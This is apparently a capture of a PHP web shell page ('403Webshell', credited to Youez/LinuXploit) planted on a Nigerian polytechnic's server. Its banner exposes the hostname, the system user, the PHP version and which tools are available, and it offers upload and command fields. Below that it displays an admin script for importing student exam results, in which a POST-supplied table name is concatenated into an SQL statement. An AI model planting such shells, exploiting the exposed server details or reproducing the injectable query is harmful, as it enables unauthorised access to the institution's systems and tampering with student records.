403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.131.126
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/uploadResult_process.php
<?php
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 02/6/2018
 * Time: 1:18 PM
 */
include('headMain.php');

?>
<div class="row">
    <div class="col-lg-1"></div>
    <div class="col-lg-8">
        <div class="panel panel-default">
            <div class="panel-heading">
                Uploading Result
            </div>
            <div class="panel-body">

                <div class="row">
                    <div class="col-lg-12">

                    <?php
require_once('../result_connect.php');
                    $dbh=rdb_connect();
if(isset($_POST["submit"]))
{
//    echo "am here";
$file = $_FILES['file']['tmp_name'];
$handle = fopen($file, "r");
$c = 0;

while(($filesop = fgetcsv($handle,1000000, ",")) !== false) {


    $school = $filesop[0];
    $dept = $filesop[1];
    $FullNames = $filesop[2];
    $MatricNo = $filesop[3];
    $Level = $filesop[4];
    $SubjectCodes = $filesop[5];
    $SubjectNames = $filesop[6];
    $SubjectUnits = $filesop[7];
    $Scores = $filesop[8];
    $Grades = $filesop[9];
    $Points = $filesop[10];
    $prevCGPA = $filesop[11];
    $presGPA = $filesop[12];
    $CGPA = $filesop[13];
    $Remark = $filesop[14];
    $Supress = $filesop[15];
//    $RefNumber = $filesop[26];

//    $CosCode = $filesop[5];
//
//    $Mode = $filesop[5];
//
//    $YearAdmitted = $filesop[7];
//    $prevTNU = $filesop[14];
//    $prevTCP = $filesop[15];

//    $presTNU = $filesop[17];
//    $presTCP = $filesop[18];
//
//    $cumTNU = $filesop[20];
//    $cumTCP = $filesop[21];
//
//    $cumOUT = $filesop[23];
//    $cumTUP = $filesop[24];


    $FullNames = str_replace("'", "''", $FullNames);

    /* $check_data=$dba->query("select * from rawcgpa where matNo='$matNo' and level='$level' and asession='$asession'");
     $check_num=$check_data->rowCount();
     $dataNow=$check_data->fetch(PDO::FETCH_BOTH);

     if($check_num>0){
         echo 'Already Exist=>'.$matNo.'=>'.$level.'=>'.$gpa.'=>'.$cgpa.'<br>';
         echo 'Present Record =>'.$matNo.'=>'.$level.'=>'.$dataNow['gpa'].'=>'.$dataNow['cgpa'].'=>'.$dataNow['cgpa'].'<br>';
     }else {

 */
//$sql=$db->query("INSERT INTO `fedpoly`.`rawcgpa` (`sn`, `school`, `dept`, `matNo`, `names`, `level`, `gpa`, `cgpa`, `remark`, `supress`, `asession`) VALUES ('', 'e', '1', '1', '2', '3', '5', '6', '7', '8', '2')");
    $tableName = $_POST['tableName'];
//    $query = "INSERT INTO " . $tableName . "  (`MatricNo`, `FullNames`, `Gender`, `CosCode`, `ProgCode`, `Mode`, `Level`, `YearAdmitted`, `SubjectCodes`, `SubjectNames`, `SubjectUnits`, `Scores`, `Grades`, `Points`, `prevTNU`, `prevTCP`, `prevCGPA`, `presTNU`, `presTCP`, `presGPA`, `cumTNU`, `cumTCP`, `CGPA`, `cumOUT`, `cumTUP`, `Remark`, `RefNumber`, `Supress`)
//      VALUES ('$MatricNo', '$FullNames', '$Gender', '$CosCode', '$ProgCode', '$Mode', '$Level', '$YearAdmitted', '$SubjectCodes', '$SubjectNames', '$SubjectUnits', '$Scores', '$Grades', '$Points', '$prevTNU', '$prevTCP', '$prevCGPA', '$presTNU', '$presTCP', '$presGPA', '$cumTNU', '$cumTCP', '$CGPA', '$cumOUT', '$cumTUP', '$Remark', '$RefNumber', '$Supress')";
//echo $tableName;
//    die("am here");
  $sql="INSERT INTO ".$tableName." (`sn`, `school`, `dept`, `FullNames`, `MatricNo`, `Level`, `SubjectCodes`, `SubjectNames`, `SubjectUnits`, `Scores`, `Grades`, `Points`, `prevCGPA`, `presGPA`, `CGPA`, `Remark`, `Supress`, `ProgCode`, `Mode`, `YearAdmitted`, `prevTNU`, `prevTCP`, `presTNU`, `presTCP`, `cumTNU`, `cumTCP`, `cumOUT`, `cumTUP`, `RefNumber`) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
//   echo $kk="INSERT INTO ".$tableName." (`sn`, `school`, `dept`, `FullNames`, `MatricNo`, `Level`, `SubjectCodes`, `SubjectNames`, `SubjectUnits`, `Scores`, `Grades`, `Points`, `prevCGPA`, `presGPA`, `CGPA`, `Remark`, `Supress`, `ProgCode`, `Mode`, `YearAdmitted`, `prevTNU`, `prevTCP`, `presTNU`, `presTCP`, `cumTNU`, `cumTCP`, `cumOUT`, `cumTUP`, `RefNumber`) VALUES (NULL,'$school','$dept','$FullNames','$MatricNo','$Level','$SubjectCodes','$SubjectNames','$SubjectUnits','$Scores','$Grades','$Points','$prevCGPA','$presGPA','$CGPA','$Remark','$Supress','0','0','0','0','0','0','0','0','0','0','0','0')";
//    $sql=$dbh->query($kk);
//  die();
    $query=$dbh->prepare($sql);
    $query->execute([NULL,$school,$dept,$FullNames,$MatricNo,$Level,$SubjectCodes,$SubjectNames,$SubjectUnits,$Scores,$Grades,$Points,$prevCGPA,$presGPA,$CGPA,$Remark,$Supress,'0','0','0','0','0','0','0','0','0','0','0','0']);

}
if($query){
    echo "Your database has imported successfully";
//    echo $sql;
}
}else {
    echo "Sorry! There is some problem.";
//}
}


?>

                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<?php
include('footMain.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit